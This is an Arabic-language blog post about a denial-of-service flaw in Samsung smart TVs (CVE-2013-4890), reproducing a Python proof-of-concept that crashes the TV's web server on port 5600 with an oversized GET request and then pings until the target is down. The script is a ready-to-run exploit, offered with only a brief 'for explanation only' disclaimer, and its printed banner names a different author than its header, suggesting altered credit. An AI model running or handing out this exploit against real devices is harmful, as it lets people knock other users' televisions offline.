تغرة فى شاشات Samusung تمكنك من عمل Ddos attack
أكد الباحثون في مجال الامن المعلوماتي على إيجادهم لتغرة في أجهزة التلفاز سامنونج تمكنه من عمل هجوم حجب الخدمة،حيث يشكل هذا التهديد خطر كبير على هذه الأجهزة التلفزية ، حيث تتوفر هذه الاجهزة على قدرة الاتصال بالانترنت
مع العلم أن هذا الهجوم يتم عن طريق سكريبت معين مكتوب بلغة البايثون حيث يتم تشغيله من جهاز متصل على نفس الشبكة التي عليها جهاز التلفاز
و أكد الباحث الامني ان الجهاز التلفزي متبث عليه ويب سرڤرحيث مباشرة بعد إرسال طلبات حجب
الخدمة من المهاجم يقوم السرڤر بالرد على هاته الطلبات عبر پورت5600 حيث يمكنه من حجب الصورة و الصوت للجهاز عن طريق الواي فاي و بالتالي تمكنك من عمل هجوم حجب الخدمة عن طريق ارسال عدة بروتوكولات بشكل متتابع حيث يقوم الجهاز بحجب الصورة و الصوت متأترا بالهجمة
(الغرض هو عرض للشرح فقط !!):السكريبت المستعمل في الهجمة
#!/usr/bin/python
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
# As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
import httplib
import sys
import os
print " **************************************************************"
print " Author: Belalatia - @MME_IT - http://www.pr0programer.tk\n"
print " Exploit: Denial of Service (DoS) attack\n"
print " Description:\n"
print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print " Tested successfully on my Samsung PS50C7700 plasma TV :) \n"
print " ******************************************************************\n"
# Sends the payload
print " Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()
# Checks the response
print " Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print " Target down!\n"
لا يوجد تعليقات
شاركنا الرائ